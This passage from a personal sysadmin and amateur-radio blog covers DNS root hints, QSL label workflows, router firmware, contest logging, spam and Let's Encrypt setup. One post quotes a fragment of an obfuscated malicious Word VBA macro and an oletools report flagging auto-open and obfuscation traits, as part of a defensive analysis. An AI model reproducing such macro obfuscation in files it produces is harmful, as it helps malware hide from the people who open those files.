2016-06-27 Ancient configuration causing warnings 4 days ago
Lots of error messages showing up recently looking like:
Jun 27 12:02:23 greenblatt named[4789]: checkhints: d.root-servers.net/A ( missing from hints
Jun 27 12:02:23 greenblatt named[4789]: checkhints: d.root-servers.net/A ( extra record in hints
The hints come from the root-hints file which the resolver software (bind9) uses to know where to start resolving. I checked my db.root, which said:
;       last update:    Jun 17, 2010
;       related version of root zone:   2010061700
But it is from the ubuntu 12.04 bind9 package:
# dpkg -S /etc/bind/db.root
bind9: /etc/bind/db.root
Solution with help from How Do I Update The Root Hints Data File for BIND Named Server? - UNIX fu was getting the latest from ftp.rs.internic.net which now says
;       last update:    March 23, 2016
;       related version of root zone:   2016032301
and I should get less warnings now. Comparing the two files shows changed IPv4 addresses for d.root-servers and h.root-servers, changed IPv6 addresses for a.root-servers and h.root-servers and added(!) IPv6 addresses for c.root-servers, d.root-servers, i.root-servers and j.root-servers.

Tags: , ,
2016-06-26 Working two hours in glabels to save me from one hour of QSL card writing 5 days ago
The new and improved QSL card workflow I thought about in April has come true. In the mean time I bought printer labels and this evening I took my time to work through the last (at the moment..) outgoing QSL cards for PD4KH and printed labels for them.

Creating outgoing QSL cards with printer labels - KvdHout on flickr
Creating outgoing QSL cards with printer labels
Labels affixed to outgoing QSL cards and signed - KvdHout on flickr
Labels affixed to outgoing QSL cards and signed
In the end it saves me from having a cramp in my hand from QSL card writing, but it took me a lot of print previews to get the design just right. And after printing I saw I still have not found a font with a slashed zero in it.

I still sign the cards with my name by hand, but that's a lot less work.

Things learned:
  • Changing the exported fields in CQRLOG changed the field numbers in the CSV.
  • CQRLOG export csv files have no newline at the end. I combined two selections (send via bureau and send via manager via bureau) and it took me a while to note one QSL missing.
  • CQRLOG default is to export just the band. I like having the frequency on my cards.
  • Fiels exported: Date, time on, Callsign, Freq, RST Sent, QSL manager, Comment, QSL PSE/TNX

Update 2016-06-27: A bit of searching found me A Slashed-Zero Droid Sans Mono - cosmix.org. Downloaded the zip file, unpacked DroidSansMonoSlashed.ttf in /usr/share/fonts/truetype/droid and it was available to glabels instantly.

And I printed the first labels outgoing QSL cards for PE4KH and now this new workflow is saving me time. I decided to keep using my 'old' PD4KH cards with a small label updating the callsign. Now I am actually saving time!

Tags: ,
2016-06-26 (Userfriendly reminding us about an age when web advertising was just annoying. We upgraded to a threat...) 5 days ago
Google+Koos van den Hout : Userfriendly reminding us about an age when web advertising was just annoying.
We upgraded to a threat to your system and to your data usage!
2016-06-23 PPPoE forwarding voor de FRITZ!Box 1 week ago
Ik zag ergens voorbij komen dat er nieuwe firmware voor de FRITZ!Box 7360 was met in de release notes:
Improved: Support can be enabled for PPPoE passthrough
Dus ik haalde snel die firmware binnen en ging deze testen. Maar deze werd geweigerd door de FRITZ!Box. Na goed nakijken bleek dat deze feature en andere updates er alleen zijn voor de 7360 v2 versie, en ik heb in maart 2014 een FRITZ!Box 7360 v1 ontvangen en daar zijn nog geen nieuwere firmware versies dan 06.30 voor, dus geen pppoe passthrough. Via de AVM Nederland supportsite maar even een call aangemaakt met het verzoek om die verbetering ook beschikbaar te stellen.

De DrayTek Vigor 130 doet het goed, maar ik zou het wel prettig vinden om te kunnen wisselen met een "officieel" modem in PPPoE passthrough mode zodat ik de VDSL storingen daar ook kan onderzoeken.

Update 2016-06-24: Antwoord van AVM: zie Why is the latest FRITZ!OS not available for the FRITZ!Box 7360 v1? oftewel door hardware beperkingen van de _v1 versie zal er niet gauw een update komen.

Tags: ,
2016-06-23 A serious thunderstorm somewhat counted 1 week ago
Lightning strikes 20160623 Last night a serious lightning storm passed and it got counted, but clearly with the same problems in counting as seen before in counting thunderstorms from the shed while radio activity causes a lot higher counts. Looking at the graphs for thunderstorms counted from the attic before I was active on HF radio there is quite a difference in numbers.

I think I want the lightning strikes counter back up in the attic but with a low-pass filter somehow to filter out false counts from amateur radio traffic.

Tags: , , ,
2016-06-22 Automatische vertalingen helpen niet altijd 1 week ago
Uit de spam mail:
In de link hieronder ontvangt u de factuur van KPN.
Voor uw veiligheid uw botbreuk is wachtwoord protected.Uw wachtwoord is 2hw3DXy .
Ik knipperde even, maar ik realiseerde me dat er vast iets met automatische vertaling is gedaan van factuur/fracture.

Tags: ,
2016-06-21 My fldigi digimode contest macros 1 week ago
In almost every digimode contest I improve my contest macros a little, so I decided to share them. Credit goes to FLDIGI Contest - How To for a lot of the initial inspiration and Choosing your basic macros - VA2UP RTTY Contesting which has the really minimal approach, and this helped me with finetuning.

This will be a quite long post only interesting to a very specific group!

Digimode is the name for all radio modes in which digital information is exchanged and a computer is used to encode and decode the digital information into something the radio can work with.

Digimode contesting for me includes RTTY and PSK63 contesting, there are other modes used in digimode contests.
Read the rest of My fldigi digimode contest macros

Tags: , ,
2016-06-19 I participated in the Ukranian classic RTTY contest 1 week ago
Without a lot of preparation I participated in the 2016 Ukranian classic RTTY contest contest just to see how I would do and maybe get one or two new interesting entities in the log.

The radio interference was active all weekend on 40 meter so I participated only on the 20 meter band.

In the end I participated for about just over 3 hours and made 64 contacts. Interesting new entities were Venezuela (new country) confirmed, Pennsylvania confirmed and North Carolina confirmed (new US states). Confirmations come in quick via eQSL and LoTW!

I updated the Veron afdelingscompetitie with the results. And all the other usual places where I upload the logs of my radio contacts. Already the first confirmations via eQSL are coming in and visible in my eQSL received at PD4KH / PE4KH collection.

Tags: , , ,
2016-06-16 Weer andere firmware DrayTek Vigor 130 2 weeks ago
Na een week met stijgende aantallen hikken in de vectored vdsl verbinding maar weer eens gekeken naar de firmware versies. Op Firmware - Vigor 130 - Draytek staat nu firmware versie 3.7.9 met wat updates in diverse varianten waaronder 2 keer voor het KPN netwerk.

Ik ben maar weer overgeschakeld naar de modem5 versie uit Vigor130_v3.7.9_modem5.zip, eens kijken wat dat doet voor de stabiliteit.
Read the rest of Weer andere firmware DrayTek Vigor 130

Tags: ,
2016-06-16 Recovered the Raspberry Pi 2 weeks ago
So when the Raspberry Pi 3 came out in February I bought one, complete with power supply, case, microSD card and small keyboard. I just could not resist it. I installed it, connected it to the network and did not really have a task for it. It is joy.idefix.net.

After a while this changed and I started running dump1090 on it to get an idea of the planes in range from my house. It is connected to the antenna used in the earlier ADS-B receiving experiments and sees high altitude and/or nearby airplanes fine.

Recently I ran some updates and those failed because the root-filesystem was filling up. I did not notice that left some files missing, so I just ran the commands to resize the raspbian root filesystem to fill the SD card - Coderwall and waited for the reboot. This ended up in a nice multicolour screen with nothing running. I looked that up and found Raspberry Pi with boots up with Rainbow screen - Raspberry Pi Stack Exchange so it was time to recover. I mounted the SD card on an x86 linux system and found the kernel.img and other files in /boot were missing. I searched how to mount the raspbian image and found How can I mount a Raspberry Pi Linux distro image? - Raspberry Pi Stack Exchange. I started with using the loopback device, copied the whole /boot directory from that image and did a filesystem check in the SD card. It booted again but showed driver issues. I reran all the updates which reinstalled the raspberrypi-kernel package and after that the driver problems were gone and things worked again.

Tags: , ,
2016-06-16 Connecting to eduroam with the new laptop 2 weeks ago
For the first time I brought my new personal laptop to a place where I could use eduroam wireless network. This gave some trouble, eduroam did not work out of the box. I had to set the authentication method to 'Protected EAP (PEAP)' and set the inner authentication correct. And I had to set the CA-Certificate to check. If you don't set it, network manager settings will ask if you are sure, but if you say you are sure the net result in the background is that the request for a valid certificate is set but there is no certificate set to check against, resulting in the connection not working.

Tags: , , ,
2016-06-14 1dayfly spam 'via lead4cash' 2 weeks ago
Op een adres wat ik daar niet voor opgegeven heb (en niet voor zou gebruiken) kreeg ik spam van 1dayfly. Opvallend was in de tekst:
U krijgt deze nieuwsbrief omdat wij uit naam van Lead4Cash mailen en u daarmee heeft aangegeven onze nieuwsbrief te willen ontvangen!

We beloven u geen ongevraagde e-mails te sturen! 1DayFly.com verkoopt of verhuurt nooit haar gegevens aan derden.
1dayfly kan heel veel beweren maar met een naam als 'lead4cash' ga ik al uit van vervuilde marketing bestanden. Als je businessmodel 'lead4cash' oftewel 'geld voor gegevens van consumenten om te benaderen' is kost het alleen maar geld om te controleren of die 'leads' wel benadert willen worden. En dus is het niet opvallend dat er een adres tussen zit wat dat niet wil.

Zoals gebruikelijk: The Rules of Spam.

Update 2016-06-21: Uit een latere mail blijkt ook wel hoe mager de bestanden zijn:
Uw 1DayFly.com aanbiedingen van dinsdag 21 juni Wilt u een persoonlijke nieuwsbrief? Vul hier uw naam in:
Mijn conclusie is dan dat ze echt alleen maar een bak e-mail adressen ergens vandaan hebben. Dan vraag je ook om spamklachten.

Tags: , ,
2016-06-10 ISS SSTV MAI-75 image received 3 weeks ago
ISS SSTV June 2016 MAI-75 image recieved by PE4KH at JO22NC 20160610 at 1900 UTC
ISS SSTV June 2016 MAI-75 image recieved by PE4KH at JO22NC 20160610 at 1900 UTC
I had no advance warning but suddenly mailing lists and other places I find my amateur radio satellite news lit up with news of another round of slow scan TV (SSTV) images. I thought at first things would be over Friday evening but then the reports started again and I put the radio, antenna and laptop outside to record another pass and decode it. Reasonable decode, especially for the pass starting in the noise.

Tags: , ,
2016-06-07 Obfuscated VBA macros in word files 3 weeks ago
I wanted to look at some suspicious word files to see whether the macros tried anything funny. Some searching showed me oletools which can do this and report. A sample:
Public Sub ZkBWG(ByVal uSHdvTl As String)
Dim RxXFgnMOu As Integer
VOyiBpZDIb.cFRHErvQ OdAkk.VWUUdYKG(553, JocsGn("PlJlXeAhESM.MtxpOizrMccS2W")), _
uSHdvTl, JocsGn("LcxeVxVE")
End Sub
Private Function xcOdDXhiP() As Integer
Dim NJuBRTz As String
Dim RemmeQk As Integer
xcOdDXhiP = 400
End Function
Private Function JocsGn(ByVal gAVndNSJ As String) As String
JocsGn = ZYkwp.kYxFEH(gAVndNSJ)
End Function

| Type       | Keyword        | Description                             |
| AutoExec   | Document_Open  | Runs when the Word document is opened   |
| Suspicious | CreateObject   | May create an OLE object                |
| Suspicious | CallByName     | May attempt to obfuscate malicious      |
|            |                | function calls                          |
| Suspicious | Hex Strings    | Hex-encoded strings were detected, may  |
|            |                | be used to obfuscate strings (option    |
|            |                | --decode to see all)                    |
| Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
|            |                | may be used to obfuscate strings        |
|            |                | (option --decode to see all)            |

Tags: , ,
2016-06-05 I participated in parts of the DigiFest 2016 contest 3 weeks ago
Recently I was looking whether there was an interesting upcoming digital amateur radio contest. Simply because I wanted to make a number of contacts in a short period, maybe contact some new countries. On the Contest calendar I found the DigiFest contest which is all about promoting digital modes.

I set up the outside endfed antenna on Friday evening, used it to participate in the roundtable after the PI4AA radio bulletin on 40 meters. I also checked the exchange needed for this contest and programmed it in a separate macro definition for fldigi. So I was prepared and gave it a go Saturday evening. I could not participate in the 04:00 UTC - 12:00 part on Saturday because of the normal family things that have to happen on a Saturday morning. On Saturday evening I started out right at 20:00 UTC on the 40 meter band. After an initial number of nice contacts it sort of 'dried up' for me and I saw no new stations active. So I switched to the 20 meter band and got a number of new contacts, including some callsigns who seemed to have made the same decision to switch to the 20 meter amateur band.

On Sunday things got worse as the local high-power HF noise was active again, obliterating nearly all signals. And increased solar winds caused propagation to drop.

So propagation wasn't cooperating very well, and the contest did not seem very popular. In the end I made 41 contacts which is less than I expected.

Update: The upsides are there: I received eQSL confirmation for a contest contact with VE3UTT which means I finally have a form of confirmation for a contact with Canada and a confiromation for a contact with N6AR which adds another US state.

Tags: , ,
2016-06-04 Phishing melden aan ICScards is nog lastig 3 weeks ago
Ik ben geen klant van ICScards maar toch wil ik soms interresante nieuwe phishing pogingen melden bij ze. Volgens Phishing: valse e-mails die in omloop zijn is de manier gewoon via e-mail naar het valse-email@ adres.

Maar helaas lukt het niet:
   ----- The following addresses had permanent fatal errors -----
    (reason: 550 Denied by policy)

   ----- Transcript of session follows -----
... while talking to mail01.icscards.nl.:
>>> DATA
<<< 550 Denied by policy
554 5.0.0 Service unavailable
het valse-email@ adres zit achter mailfilters die blijkbaar duidelijk herkenbare phishing mail blokkeren. Misschien moeten ze dat adres apart behandelen zodat ze dit soort meldingen wel binnenkrijgen...

Tags: , ,
2016-06-03 Luisteren naar de PI4AA ronde op 40m met lokale storing 4 weeks ago
Ik heb weer eens geluisterd naar de PI4AA uitzending. Dit keer heb ik geluisterd via de PI2NOS livestream en heb ik me daarna eens ingemeld via de inmeldronde op de 40 meter band omdat ik toch de endfed antenne had buiten gehangen vanwege een contest in het komende weekend. In SSB is de lokale storing erg duidelijk aanwezig. De storing is ongeveer S9 dus ik hoorde PI4AA zelf redelijk goed met een signaal wat daar net 10 dB boven zat. De meeste inmelders hoorde ik slecht of niet.

Hierbij een klein stukje met Remco PA3FYM als rondeleider.
Listen to audio attachment:
MP3 media: PI4AA ronde op 40m 20160603 (rightclick, select save-as to download)

Tags: ,
2016-06-02 Not filling my disk with .well-known/acme-challenge directories 4 weeks ago
Encrypt all the things meme I am slowly gaining trust in my Let's Encrypt setup and today I renewed my certificate. One thing I noticed on the first tries was that the whole process left me with a .well-known/acme-challenge directory in every website. Solution: use the options for a general configuration item available in Apache which is then inherited by all virtual hosts. So now I have in the general configuration:
Alias /.well-known/acme-challenge/ "/home/httpd/html/.well-known/acme-challenge/"

<Directory "/home/httpd/html/.well-known/acme-challenge/">
        AllowOverride None
        Order allow,deny
        Allow from all
So now there is only one directory filling up with challenge-response files which is easier to clean out. I have seen filenames for challenge response with a - at the start so rm * started to complain.

The first complete change to https is on Camp Wireless, Wireless Internet access on campsites.

Tags: , , ,

